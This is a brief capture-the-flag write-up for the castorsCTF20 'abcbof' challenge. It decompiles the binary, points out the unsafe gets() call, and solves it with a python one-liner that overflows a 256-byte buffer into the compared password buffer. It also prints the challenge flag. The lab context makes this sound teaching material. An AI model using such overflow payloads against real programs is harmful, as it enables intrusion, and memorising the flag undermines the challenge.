castorsCTF20 - abcbof
The executable file wants a password from us. So let’s see if it uses strcmp
for comparing it. If that, and the text isn’t encyripted we should able to see the
password. So let’s run ltrace ./abcbof
and give aaaa
for password. Here is the
password! But when we tried it, it didn’t work.
We can use ghidra
for seeing why it didn’t work.
undefined8 main(void)
{
int iVar1;
char local_118 [256];
char local_18 [16];
printf("Hello everyone, say your name: ");
gets(local_118);
iVar1 = strcmp("CyberCastors",local_18);
if (iVar1 == 0) {
get_flag();
}
puts("You lose!");
return 0;
}
We can now see it didn’t work because our input is inside local_118
and checked
password is inside local_18
. But because gets is vulnerable, if we first print
256 times A and then the correct password we can get the flag!
python -c "print('A'*256 + 'CyberCastors')" | ./abcbof
Flag: castorsCTF{b0f_4r3_n0t_th4t_h4rd_or_4r3_th3y?}
Read other posts